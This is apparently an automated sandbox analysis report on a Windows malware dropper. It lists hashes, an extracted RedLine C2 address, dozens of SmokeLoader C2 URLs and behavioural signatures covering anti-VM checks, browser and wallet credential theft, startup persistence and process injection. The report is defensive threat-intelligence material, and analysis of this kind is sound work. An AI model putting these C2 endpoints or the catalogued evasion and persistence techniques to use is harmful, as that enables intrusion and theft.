Resubmissions
19-08-2021 18:59
210819-yrzbdtvqln 1018-08-2021 20:25
210818-4hztrzavcs 1018-08-2021 17:24
210818-9p8lqjhwv2 1017-08-2021 06:12
210817-kl4jvaaq7x 1016-08-2021 10:04
210816-nwc3tqkr3a 1016-08-2021 10:04
210816-5r5rafnh7e 1016-08-2021 10:04
210816-kdgh648t5e 1016-08-2021 09:37
210816-9esgfwsmfe 1016-08-2021 08:13
210816-26la9rblgn 1017-08-2021 08:51
210817-w2l5yq2wlnAnalysis
-
max time kernel
167s -
max time network
1807s -
platform
windows11_x64 -
resource
win11 -
submitted
18-08-2021 20:25
Static task
static1
Behavioral task
behavioral1
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win11
Behavioral task
behavioral3
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win10v20210408
General
-
Target
EB7233922891E1DAD0434FBD52623647.exe
-
Size
7.9MB
-
MD5
eb7233922891e1dad0434fbd52623647
-
SHA1
331126b108532ab9a1e932141bff55a38656bce9
-
SHA256
b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8
-
SHA512
597fbb0f397c45c8a2c5f63893c6d6bd4641e952510dfcac05dadb7afaaf4e005df1261649d4e79951979bad0be1fb09feebac7a6d23c31679590cbf40e1d4ac
Malware Config
Extracted
metasploit
windows/single_exec
Extracted
redline
FIRST_7.5k
45.14.49.200:27625
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Signatures
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/5112-206-0x0000000001450000-0x0000000001D76000-memory.dmp family_glupteba behavioral2/memory/2344-395-0x0000000005310000-0x0000000005C36000-memory.dmp family_glupteba behavioral2/memory/2908-416-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4564 4972 rUNdlL32.eXe 11 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6304 4972 rundll32.exe 11 -
Raccoon Stealer Payload 1 IoCs
resource yara_rule behavioral2/memory/5928-381-0x0000000004920000-0x00000000049B3000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral2/files/0x000300000002a37c-266.dat family_redline behavioral2/memory/4224-439-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/1684-443-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/2836-451-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/2836-505-0x0000000005160000-0x0000000005778000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 25 IoCs
description pid Process procid_target PID 3188 created 4860 3188 WerFault.exe 89 PID 1592 created 5112 1592 WerFault.exe 87 PID 3688 created 6000 3688 WerFault.exe 108 PID 5448 created 5928 5448 WerFault.exe 115 PID 4716 created 5972 4716 WerFault.exe 110 PID 1748 created 5948 1748 WerFault.exe 113 PID 1300 created 3168 1300 WerFault.exe 121 PID 6052 created 1196 6052 WerFault.exe 138 PID 4352 created 4584 4352 WerFault.exe 177 PID 432 created 4612 432 WerFault.exe 122 PID 1724 created 1236 1724 WerFault.exe 168 PID 5408 created 1684 5408 WerFault.exe 205 PID 1832 created 3624 1832 FE3D.exe 188 PID 3088 created 4564 3088 WerFault.exe 206 PID 7072 created 6756 7072 WerFault.exe 374 PID 6884 created 6680 6884 WerFault.exe 237 PID 7436 created 6820 7436 zKft2B0yzzw1v_cQH0E1P3ML.exe 225 PID 7668 created 5336 7668 WerFault.exe 246 PID 7556 created 6192 7556 WerFault.exe 248 PID 8012 created 4908 8012 WerFault.exe 247 PID 6700 created 5548 6700 WerFault.exe 298 PID 7344 created 7152 7344 WerFault.exe 294 PID 8124 created 6336 8124 WerFault.exe 535 PID 4312 created 6256 4312 WerFault.exe 301 PID 3416 created 7348 3416 11111.exe 304 -
resource yara_rule behavioral2/memory/5112-206-0x0000000001450000-0x0000000001D76000-memory.dmp evasion behavioral2/files/0x000300000002a382-296.dat evasion behavioral2/files/0x000300000002a389-295.dat evasion behavioral2/files/0x000300000002a366-302.dat evasion behavioral2/memory/2344-395-0x0000000005310000-0x0000000005C36000-memory.dmp evasion behavioral2/memory/2908-416-0x0000000000400000-0x0000000000D41000-memory.dmp evasion behavioral2/memory/4224-502-0x0000000004EA0000-0x0000000005446000-memory.dmp evasion -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/5972-327-0x00000000049D0000-0x0000000004A6D000-memory.dmp family_vidar behavioral2/memory/3624-541-0x00000000048E0000-0x000000000497D000-memory.dmp family_vidar -
Blocklisted process makes network request 3 IoCs
flow pid Process 152 6036 cmd.exe 172 6036 cmd.exe 276 6036 cmd.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe -
Executes dropped EXE 64 IoCs
pid Process 4816 KRSetp.exe 5092 Folder.exe 5052 Folder.exe 5112 Info.exe 4332 Installation.exe 5916 Sxg9ZZxbMH8kA5rom8mY1FbX.exe 5928 4VN6wp3p249Peftj5bgWx74K.exe 5940 YVBi_Q2DKepj565af4SD32ux.exe 5964 KjIibsr653LiAdo4AbwEUa5p.exe 5956 fyeOs5QJVz_AdrttNf_bhMfo.exe 6000 lisoce45yJdfxtoDinkLPBB0.exe 5948 IvikQulGbRWAwMsnu_ycAl0V.exe 5984 7UkvtrUTSmAK3klJFTndgCre.exe 5972 4L2GsvQzMO7vo0QaK9U3olVx.exe 6036 oZ7g_D9oITjP6QBP7YE7EdXv.exe 6072 g2lVQYLYuJPgPh38AhEEXnAB.exe 4584 Msbq7N806vY_kgIRiAQxy9Gp.exe 5036 4vd7wzaSJ6O6_peChFvraIg4.exe 3224 iN1vEaA5nIXun0Ch70YplDck.exe 4612 1nrJiz9SHjwr79c1yUpRUJCm.exe 3168 wuxK2JwKEIjFJEie_od4yOxD.exe 2344 6fCfeRmxTQ7EY00t_cotuQ81.exe 1196 R_dHTTFWkvGJQgRWc10ATFp3.exe 1288 1fp8I1cI5udt6HxCGu4Pot5B.exe 1528 0uMnKiiiV3FrbB3NKKa40YY1.exe 1744 ULQYaddSV6Nl0fN2ZjJ2vuRQ.exe 1540 xcxnFVjqK8FKwg5Qa512Ep3r.exe 1640 E2i_Z1Qek7wHynzKk_G2TtiN.exe 1896 2YaXYEQpN4D2gejue_SlPHNO.exe 1820 mdff13DR1phi2sNDJO2fNU5a.exe 1712 FKk6yd4IL4syFy2gnZDVAaMN.exe 1928 BsSk35ZHvQtQ6ycRA83qwiKw.exe 3176 9mjwIGTITPLyL7mQH0BWmdnw.exe 4120 customer3.exe 5552 md8_8eus.exe 4644 x1r61B6_PO48yubFuSiv5RUD.exe 6080 jooyu.exe 3752 x1r61B6_PO48yubFuSiv5RUD.tmp 6016 E2i_Z1Qek7wHynzKk_G2TtiN.exe 1236 xcxnFVjqK8FKwg5Qa512Ep3r.exe 2908 6fCfeRmxTQ7EY00t_cotuQ81.exe 4348 jfiag3g_gg.exe 4224 ULQYaddSV6Nl0fN2ZjJ2vuRQ.exe 1684 3377047_logo_media.exe 2836 mdff13DR1phi2sNDJO2fNU5a.exe 5648 11111.exe 2004 md9_1sjm.exe 3988 11111.exe 5544 11111.exe 3688 Setup.exe 4148 jfiag3g_gg.exe 3624 LGCH2-401_2021-08-18_14-40.exe 4868 oA8ksUPGyLC_UzTW6PxDesM6.exe 5600 MediaBurner2.exe 5548 32C5.exe 2236 Cleaner Installation.exe 5788 Versiumresearch.exe 5772 note8876.exe 5780 zhaoy-game.exe 5836 xtect12.exe 2256 Weather Installation.exe 5084 Conhost.exe 5336 3h1qGZUEdprlXIwaFgWSdLLy.exe 5592 11111.exe -
resource yara_rule behavioral2/memory/5552-359-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4vd7wzaSJ6O6_peChFvraIg4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oA8ksUPGyLC_UzTW6PxDesM6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jzIaxuTRlgKRr5Wp2_W36BRZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 32C5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BsSk35ZHvQtQ6ycRA83qwiKw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BsSk35ZHvQtQ6ycRA83qwiKw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vQ3rC0vqvYatBnp35VZuhjBv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vQ3rC0vqvYatBnp35VZuhjBv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oA8ksUPGyLC_UzTW6PxDesM6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jzIaxuTRlgKRr5Wp2_W36BRZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4vd7wzaSJ6O6_peChFvraIg4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 32C5.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe zzx.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe zzx.exe -
Loads dropped DLL 18 IoCs
pid Process 4860 rundll32.exe 3752 x1r61B6_PO48yubFuSiv5RUD.tmp 3752 x1r61B6_PO48yubFuSiv5RUD.tmp 2236 Cleaner Installation.exe 5084 Conhost.exe 2256 Weather Installation.exe 7528 fhvD868tqd9rKMZVwD3ag8Jk.tmp 7528 fhvD868tqd9rKMZVwD3ag8Jk.tmp 6960 MsiExec.exe 6960 MsiExec.exe 7632 MsiExec.exe 7632 MsiExec.exe 7632 MsiExec.exe 2596 GameBoxWin64.exe 2596 GameBoxWin64.exe 6256 rundll32.exe 2596 GameBoxWin64.exe 7604 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000300000002a37e-280.dat themida behavioral2/files/0x000300000002a39e-279.dat themida behavioral2/files/0x000300000002a381-305.dat themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vQ3rC0vqvYatBnp35VZuhjBv.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA oA8ksUPGyLC_UzTW6PxDesM6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jzIaxuTRlgKRr5Wp2_W36BRZ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 32C5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4vd7wzaSJ6O6_peChFvraIg4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BsSk35ZHvQtQ6ycRA83qwiKw.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: GameBoxWin64.exe File opened (read-only) \??\S: GameBoxWin64.exe File opened (read-only) \??\X: GameBoxWin64.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\B: GameBoxWin64.exe File opened (read-only) \??\G: GameBoxWin64.exe File opened (read-only) \??\Z: GameBoxWin64.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\H: GameBoxWin64.exe File opened (read-only) \??\T: GameBoxWin64.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\N: Weather Installation.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\G: Weather Installation.exe File opened (read-only) \??\J: Weather Installation.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: GameBoxWin64.exe File opened (read-only) \??\I: GameBoxWin64.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\G: Cleaner Installation.exe File opened (read-only) \??\L: GameBoxWin64.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: GameBoxWin64.exe File opened (read-only) \??\Q: Weather Installation.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\U: Weather Installation.exe File opened (read-only) \??\X: Weather Installation.exe File opened (read-only) \??\Z: Weather Installation.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\M: Cleaner Installation.exe File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: Weather Installation.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\B: Weather Installation.exe File opened (read-only) \??\K: GameBoxWin64.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\F: Weather Installation.exe File opened (read-only) \??\I: Weather Installation.exe File opened (read-only) \??\O: Weather Installation.exe File opened (read-only) \??\W: Weather Installation.exe File opened (read-only) \??\M: GameBoxWin64.exe File opened (read-only) \??\R: GameBoxWin64.exe File opened (read-only) \??\A: Cleaner Installation.exe File opened (read-only) \??\J: Cleaner Installation.exe File opened (read-only) \??\M: Weather Installation.exe File opened (read-only) \??\R: Weather Installation.exe File opened (read-only) \??\T: Weather Installation.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 425 ip-api.com 2 ipinfo.io 134 ipinfo.io 394 ipinfo.io 173 ipinfo.io 261 ipinfo.io 263 ipinfo.io 297 ipinfo.io 466 ipinfo.io 56 ipinfo.io 66 ip-api.com 77 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
pid Process 6036 oZ7g_D9oITjP6QBP7YE7EdXv.exe 6036 oZ7g_D9oITjP6QBP7YE7EdXv.exe 5036 4vd7wzaSJ6O6_peChFvraIg4.exe 1928 BsSk35ZHvQtQ6ycRA83qwiKw.exe 6036 cmd.exe 6036 cmd.exe 3224 Process not Found 6036 cmd.exe 6928 8vOzvG7hvLT_vK9OBgVL_Ut5.exe 6828 vQ3rC0vqvYatBnp35VZuhjBv.exe 6036 cmd.exe 4868 oA8ksUPGyLC_UzTW6PxDesM6.exe 6416 jzIaxuTRlgKRr5Wp2_W36BRZ.exe 6928 8vOzvG7hvLT_vK9OBgVL_Ut5.exe 6036 cmd.exe 6928 8vOzvG7hvLT_vK9OBgVL_Ut5.exe 5548 32C5.exe -
Suspicious use of SetThreadContext 16 IoCs
description pid Process procid_target PID 1640 set thread context of 6016 1640 E2i_Z1Qek7wHynzKk_G2TtiN.exe 159 PID 2344 set thread context of 2908 2344 6fCfeRmxTQ7EY00t_cotuQ81.exe 167 PID 1744 set thread context of 4224 1744 ULQYaddSV6Nl0fN2ZjJ2vuRQ.exe 171 PID 1528 set thread context of 1684 1528 0uMnKiiiV3FrbB3NKKa40YY1.exe 205 PID 1820 set thread context of 2836 1820 mdff13DR1phi2sNDJO2fNU5a.exe 169 PID 6788 set thread context of 7108 6788 hAdmjf27kwz_7TsacCSaTWNP.exe 239 PID 5964 set thread context of 7016 5964 KjIibsr653LiAdo4AbwEUa5p.exe 413 PID 6904 set thread context of 5376 6904 gdyzXEj5P496unOqfk6hVDCG.exe 265 PID 5984 set thread context of 6180 5984 7UkvtrUTSmAK3klJFTndgCre.exe 278 PID 6804 set thread context of 7924 6804 5YwwMGWcE2RgT9bX6bjTmfpN.exe 416 PID 6712 set thread context of 6044 6712 D4nZnvKuGza1oWNPIEDPRme3.exe 438 PID 5940 set thread context of 7416 5940 48EE.exe 286 PID 1712 set thread context of 6476 1712 FKk6yd4IL4syFy2gnZDVAaMN.exe 289 PID 6736 set thread context of 2708 6736 askinstall52.exe 379 PID 8020 set thread context of 7348 8020 build.exe 304 PID 6952 set thread context of 5972 6952 J2UMrXJ_91PPJWQrvcPYy29P.exe 313 -
Drops file in Program Files directory 28 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe Setup.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe RtAumixa8TXlF5V7YdDzWrks.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\AZJJCIMFDJ\ultramediaburner.exe.config 3377047_logo_media.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe fyeOs5QJVz_AdrttNf_bhMfo.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini fyeOs5QJVz_AdrttNf_bhMfo.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File created C:\Program Files (x86)\UltraMediaBurner\is-CROL8.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe fyeOs5QJVz_AdrttNf_bhMfo.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe Setup.exe File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe Setup.exe File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Setup.exe File created C:\Program Files (x86)\UltraMediaBurner\is-2Q9LA.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe fyeOs5QJVz_AdrttNf_bhMfo.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe fyeOs5QJVz_AdrttNf_bhMfo.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\AZJJCIMFDJ\ultramediaburner.exe 3377047_logo_media.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\Installer\f763c0b.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI43AC.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Installer\f763c0b.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 35 IoCs
pid pid_target Process procid_target 3320 4860 WerFault.exe 89 3104 5112 WerFault.exe 87 5824 6000 WerFault.exe 108 4012 5928 WerFault.exe 115 4464 5948 WerFault.exe 113 4388 1196 WerFault.exe 138 4584 1236 WerFault.exe 168 5396 1684 WerFault.exe 170 2732 4612 WerFault.exe 122 2072 3624 WerFault.exe 188 732 4564 WerFault.exe 206 7420 6756 WerFault.exe 233 7604 6680 WerFault.exe 237 8068 6820 WerFault.exe 225 7072 4908 WerFault.exe 247 4872 6336 WerFault.exe 245 7188 6256 WerFault.exe 301 7428 7348 WerFault.exe 304 420 4860 WerFault.exe 359 500 7260 WerFault.exe 376 7100 2712 WerFault.exe 389 4860 3188 WerFault.exe 381 2972 6868 WerFault.exe 408 5196 6736 WerFault.exe 401 3608 456 WerFault.exe 421 6748 1104 WerFault.exe 417 8220 436 WerFault.exe 426 6096 6044 WerFault.exe 438 8636 7680 WerFault.exe 444 8464 5904 WerFault.exe 463 3036 7748 WerFault.exe 456 1296 3332 WerFault.exe 435 6592 6420 WerFault.exe 492 2020 7492 WerFault.exe 373 5748 8512 WerFault.exe 536 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E2i_Z1Qek7wHynzKk_G2TtiN.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E2i_Z1Qek7wHynzKk_G2TtiN.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E2i_Z1Qek7wHynzKk_G2TtiN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hAdmjf27kwz_7TsacCSaTWNP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hAdmjf27kwz_7TsacCSaTWNP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hAdmjf27kwz_7TsacCSaTWNP.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString lIziCFK1Rfh68XBj6eK8MOCp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MsiExec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key 